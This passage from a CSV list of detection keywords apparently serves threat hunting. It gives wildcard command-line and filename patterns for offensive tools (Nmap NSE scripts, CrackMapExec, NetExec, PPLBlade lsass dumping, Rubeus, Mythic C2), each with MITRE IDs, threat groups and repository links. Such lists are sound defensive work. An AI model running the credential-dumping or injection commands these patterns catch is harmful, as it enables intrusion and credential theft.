- TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -* met_inject*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* metasploit-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* metasploit-msgrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* metasploit-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -method * -nthash *,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,0,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -* Microsploit.sh*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,0,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -* mikrotik-routeros-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mimikittenz*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* mmouse-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mmouse-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* modbus-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --mode decrypt --dumpname *.dmp --key *,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode dump --name *.exe --handle procexp --obfuscate*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode dump --name lsass.exe*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -* --mode proxy --ghidra *--dll *,offensive_tool_keyword,Spartacus,Spartacus DLL/COM Hijacking Toolkit,T1574.001 - T1055.001 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/Accenture/Spartacus,1,0,N/A,10,9,826,104,2023-09-02T00:48:42Z,2022-10-28T09:00:35Z -* 
mongodb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mongodb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mongodb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* monitor /interval:* /filteruser:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* moodlescan -r -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* mqtt-subscribe.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mrinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* MS15-034.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,0,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -* ms17010 -i *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* ms17010 -n *,offensive_tool_keyword,cobaltstrike,Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/uknowsec/TailorScan,1,0,N/A,10,10,269,49,2020-11-12T08:29:11Z,2020-11-09T07:38:16Z -* msfdb run *,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -* --msfoptions *,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,0,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -* --msf-path*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* Mshikaki.cpp*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,0,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -* msrpc-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mssql * -u * -p * -M met_inject*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* mssql * -u * -p * -M mssql_priv*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* mssql * -u * -p * -M web_delivery *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* ms-sql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-dac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-hasdbaccess.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ms-sql-xp-cmdshell.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mtrace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* murmur-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-audit.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-variables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mysql-vuln-cve2012-2122.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,0,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -* mythic start*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* mythic_container.Mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* mythic_payloadtype_container*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -* mythic-cli*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,0,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -* -n *TotallyLegitTool*,offensive_tool_keyword,InvisibilityCloak,Proof-of-concept obfuscation toolkit for C# post-exploitation tools,T1027 - T1059.003 - T1140 - T1107,TA0004 - TA0005 - 